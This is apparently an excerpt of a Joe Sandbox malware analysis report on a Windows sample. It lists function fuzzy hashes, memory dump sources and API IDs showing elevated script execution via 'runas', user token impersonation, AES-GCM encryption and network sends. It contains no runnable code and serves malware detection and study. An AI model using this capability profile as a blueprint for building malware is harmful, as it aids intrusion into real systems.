                                                                                                                • Opcode ID: 2e6290f5ceb1e1a5d08f15c314bfe9c0271c0b50a60e4e2b27b7f570e3d12b72
                                                                                                                • Instruction ID: 230268cabd1d161ee7a9d6c45d48e5b0014f635b9f47cfb3fee04f02f6910c41
                                                                                                                • Opcode Fuzzy Hash: 2e6290f5ceb1e1a5d08f15c314bfe9c0271c0b50a60e4e2b27b7f570e3d12b72
                                                                                                                • Instruction Fuzzy Hash: E2F0C2A2E15B8540EB189B24E04437C6361AB44FC8F544532CABC4A6D6EF7DC585C340
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: send
                                                                                                                • String ID:
                                                                                                                • API String ID: 2809346765-0
                                                                                                                • Opcode ID: 10723b900c3d3fb221c2729e0f2ab508e71a113b43aaaf7fd55bda6ca2804ccb
                                                                                                                • Instruction ID: e2b538de0a57c057fe52c3c164f8d8f627be18dee0a2b9002c67d273468f52de
                                                                                                                • Opcode Fuzzy Hash: 10723b900c3d3fb221c2729e0f2ab508e71a113b43aaaf7fd55bda6ca2804ccb
                                                                                                                • Instruction Fuzzy Hash: 6301D631B18A8585DB508F16F940529B7B1FB88FE4F485230EF6D83B88EF29D8818B00
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: NameUser
                                                                                                                • String ID:
                                                                                                                • API String ID: 2645101109-0
                                                                                                                • Opcode ID: 543acbdf146a9e7b635a600a3cba3d05f3b2ef6cd278b1f660c9ea2185c3ff0f
                                                                                                                • Instruction ID: f8395002ab6581e26ab3b8ab7f050cf23a158cbb66c7024c7df0053592b8d4c5
                                                                                                                • Opcode Fuzzy Hash: 543acbdf146a9e7b635a600a3cba3d05f3b2ef6cd278b1f660c9ea2185c3ff0f
                                                                                                                • Instruction Fuzzy Hash: DA01883291C78182E720CF21E8403AEB3B0FB987C4F440231E69D82685EF7CD194CB40
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileFindNext
                                                                                                                • String ID:
                                                                                                                • API String ID: 2029273394-0
                                                                                                                • Opcode ID: 752fe5805e453647425062ce64daa4e53c54a82ad0d646f83825288564bb7983
                                                                                                                • Instruction ID: 1de9842b210b07082c0d157dab6fc82e610e190a0085625a001376bc5bcc00e2
                                                                                                                • Opcode Fuzzy Hash: 752fe5805e453647425062ce64daa4e53c54a82ad0d646f83825288564bb7983
                                                                                                                • Instruction Fuzzy Hash: 9B01212661CA8181DB70DB16F4542AA6374FBC8BD4F444132DE9D83B98EF3CD846CB00
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                • String ID:
                                                                                                                • API String ID: 3215553584-0
                                                                                                                • Opcode ID: 68ea0e6e30933e9dd76abf56f21314c638998a57c534cc3687c594a1fb5b02e7
                                                                                                                • Instruction ID: 3f4c103c3cc6f8f6a4a64b6646457d25088d9d4d598d45907371b50ee9fabb5e
                                                                                                                • Opcode Fuzzy Hash: 68ea0e6e30933e9dd76abf56f21314c638998a57c534cc3687c594a1fb5b02e7
                                                                                                                • Instruction Fuzzy Hash: 8CE09231E1DA4381EBA56BA9E28217CA1706F44BF5F544331EA3C866C6EF3895504710
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileFindNext
                                                                                                                • String ID:
                                                                                                                • API String ID: 2029273394-0
                                                                                                                • Opcode ID: 4104833be8186ecfced91f05a1dc286f8d4e1ac7fad94ea37a2bf5d234dce428
                                                                                                                • Instruction ID: 264f0adf660ff481894506a5cdcbfb227ac28413435df45a41fdeca7e4e5fa78
                                                                                                                • Opcode Fuzzy Hash: 4104833be8186ecfced91f05a1dc286f8d4e1ac7fad94ea37a2bf5d234dce428
                                                                                                                • Instruction Fuzzy Hash: 06C04C15F1D983D1E7541F625D921A212D06F547A1F540031C51AC0190FF5C91D68E11
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoNativeSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 1721193555-0
                                                                                                                • Opcode ID: ebb3c2d15c06801dfe805b6087078b0f501a5fe9f8c446694f4975735c5f9cad
                                                                                                                • Instruction ID: 27d5f67e98c96a68223606b366ed9219486591d43bd42b5530a7d1d00a8134ac
                                                                                                                • Opcode Fuzzy Hash: ebb3c2d15c06801dfe805b6087078b0f501a5fe9f8c446694f4975735c5f9cad
                                                                                                                • Instruction Fuzzy Hash: F4B09236F188C1C3C711EF04E852069B331FB94B0AFD00020E28F82664DF2CEA2A8E00
                                                                                                                APIs
                                                                                                                • HeapAlloc.KERNEL32(?,?,00000000,00007FF6F1DEA0C6,?,?,-2723E8D8DEBC5093,00007FF6F1DE4E71,?,?,?,?,00007FF6F1DED3FC), ref: 00007FF6F1DEDA85
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 4292702814-0
                                                                                                                • Opcode ID: 9ae9f8af891c0b94514e7ea55ed6623f4eb6cc8682cd7ae55c8d48968416ecb5
                                                                                                                • Instruction ID: c9870c961832f47ab33bfe46ffa6bf796e51ff5f19dacf22063972eea3258aec
                                                                                                                • Opcode Fuzzy Hash: 9ae9f8af891c0b94514e7ea55ed6623f4eb6cc8682cd7ae55c8d48968416ecb5
                                                                                                                • Instruction Fuzzy Hash: D4F04945F0DA0341FF585A6169503B692A12FA8BD5F8C4630C83EC72C2FF2CEB808310
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 4292702814-0
                                                                                                                • Opcode ID: eba47d0c810211a009f984e3ce810decee2d7cb9fb39a7e87e15bbee8ef19542
                                                                                                                • Instruction ID: a51433e3f997077d1cfa981715e55fa635a94b130d3fd4d8d97522dc8c1e44cf
                                                                                                                • Opcode Fuzzy Hash: eba47d0c810211a009f984e3ce810decee2d7cb9fb39a7e87e15bbee8ef19542
                                                                                                                • Instruction Fuzzy Hash: 01F0F815F0D24B55FF9867B29D5567992A05F88BF6F480734E83EC52C2FFACA680A310
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrcpy$lstrcat$AllocateInitLockMemoryObjectStringUnicodeVirtual$AcquireEnumerateFolderFreeInitializeKnownLoadedModulesPathReleaseTaskUninitialize_invalid_parameter_noinfo_noreturn
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 2979746431-4108050209
                                                                                                                • Opcode ID: 4a348020457a30817fc347b4c59be484125d27914f906bd16c32a0a05ef1d152
                                                                                                                • Instruction ID: ac92ea6b2e4e294a8bdb1d4b2c90400d9b87b7fa4caea80792f6e32eb036f65d
                                                                                                                • Opcode Fuzzy Hash: 4a348020457a30817fc347b4c59be484125d27914f906bd16c32a0a05ef1d152
                                                                                                                • Instruction Fuzzy Hash: 4BC2B93662AF948AD7908F69E88169DB3B5F788B88B105225FFCD57B18EF38C154C740
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$ExecuteShell
                                                                                                                • String ID: .cmd$.exe$.exe$.ps1$.vbs$abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+=-&^%$#@!(){}[},.;'$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$open$runas
                                                                                                                • API String ID: 4120902618-4093014531
                                                                                                                • Opcode ID: d183a49cb038e1e05b35cdc0479dea64a12b0c8edb0861e5c6556ee9c69445ec
                                                                                                                • Instruction ID: d50eb7b91e400fd1c1588a0d22b3737a1122adc4c866fd6776c801f91fa113ec
                                                                                                                • Opcode Fuzzy Hash: d183a49cb038e1e05b35cdc0479dea64a12b0c8edb0861e5c6556ee9c69445ec
                                                                                                                • Instruction Fuzzy Hash: CB22AE72A14B8585EB10DF28D8803AD67B1FB847D8F505736EA6D87AE9EF78D184C340
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_destroy
                                                                                                                • String ID: value
                                                                                                                • API String ID: 1346393832-494360628
                                                                                                                • Opcode ID: 45e6fbfa6b6b4078cd03c9fd33ec0732ad900381c9bd72a0abe7b5f9cb86b756
                                                                                                                • Instruction ID: cfea6c6a74bb992daa41c9757786ff4881b293833ec322f0c1513cec0aec01fb
                                                                                                                • Opcode Fuzzy Hash: 45e6fbfa6b6b4078cd03c9fd33ec0732ad900381c9bd72a0abe7b5f9cb86b756
                                                                                                                • Instruction Fuzzy Hash: 4702A022A18BC185EB00DB74D4903AE6771EB857E4F505731FAAE82ADAEF3CD185C740
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Crypt$_invalid_parameter_noinfo_noreturn$AlgorithmConcurrency::cancel_current_taskGenerateOpenPropertyProviderSymmetric
                                                                                                                • String ID: AES$ChainingMode$ChainingModeGCM
                                                                                                                • API String ID: 2556340343-1213888626
                                                                                                                • Opcode ID: f6f60292c266723fb15cd6c1a33b7d9c977a079a37895f601602e26d361ee006
                                                                                                                • Instruction ID: fd8fb54cfbbfcee2fc06f5e2899bbf4899c1458e95ec4af06e0d18ddfaeaeb64
                                                                                                                • Opcode Fuzzy Hash: f6f60292c266723fb15cd6c1a33b7d9c977a079a37895f601602e26d361ee006
                                                                                                                • Instruction Fuzzy Hash: 00610262A1878686FB109F26E4407A96360EB85BE8F544731EF7C87BD5EF3CE5818300
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FormatInfoLocaleMessage
                                                                                                                • String ID: !x-sys-default-locale
                                                                                                                • API String ID: 4235545615-2729719199
                                                                                                                • Opcode ID: e9313e5009c165bfc27bb14f9f63cf4f23352891cc12b2974ad7925588fd8796
                                                                                                                • Instruction ID: 4f70da2c006c1098dfbbd2f2f042c445e692f71d95456e6e11bd2682226293dc
                                                                                                                • Opcode Fuzzy Hash: e9313e5009c165bfc27bb14f9f63cf4f23352891cc12b2974ad7925588fd8796
                                                                                                                • Instruction Fuzzy Hash: FE018476B1878282F7118B12B5547BA7791FB887C5F544035DA6B86AD4EF3CE505CB00
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastValue$InfoLocale
                                                                                                                • String ID:
                                                                                                                • API String ID: 673564084-0
                                                                                                                • Opcode ID: d3f265d93177da05e9e3079d3dae9c7822de4fa7ba26229b0f968e85ede82faf
                                                                                                                • Instruction ID: 979d89b1fd90ba10cff9f2c54f2b2dc1828e3818801dbd25c34340aa8424a2fb
                                                                                                                • Opcode Fuzzy Hash: d3f265d93177da05e9e3079d3dae9c7822de4fa7ba26229b0f968e85ede82faf
                                                                                                                • Instruction Fuzzy Hash: E3314532E0868286EB289B21D4613A973B1FB847C8F449235EB6DC72C9EF3CE5558700
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00007FF6F1DE9EEC: GetLastError.KERNEL32 ref: 00007FF6F1DE9EFB
                                                                                                                  • Part of subcall function 00007FF6F1DE9EEC: FlsGetValue.KERNEL32 ref: 00007FF6F1DE9F10
                                                                                                                  • Part of subcall function 00007FF6F1DE9EEC: SetLastError.KERNEL32 ref: 00007FF6F1DE9F9B
                                                                                                                • GetLocaleInfoW.KERNEL32(?,?,?,00007FF6F1DF92C2), ref: 00007FF6F1DF954F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$InfoLocaleValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 3796814847-0
                                                                                                                • Opcode ID: 8a450860209e15821de9f16c01ed0612a725223f9a4b72f88eafb3edea00904a
                                                                                                                • Instruction ID: 24203679769fa8d4c9444f023337cc477b2c9e2a72316b98ca3640626ad33a22
                                                                                                                • Opcode Fuzzy Hash: 8a450860209e15821de9f16c01ed0612a725223f9a4b72f88eafb3edea00904a
                                                                                                                • Instruction Fuzzy Hash: FF11AB31F1855243E7688B25A06467E6271EB54798F544731F67E877C8FF29F9818700
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$Process32$CloseHandleImpersonateLoggedNextOpenProcessUser$CreateFirstRevertSelfSnapshotTokenToolhelp32
                                                                                                                • String ID:
                                                                                                                • API String ID: 2435156947-0
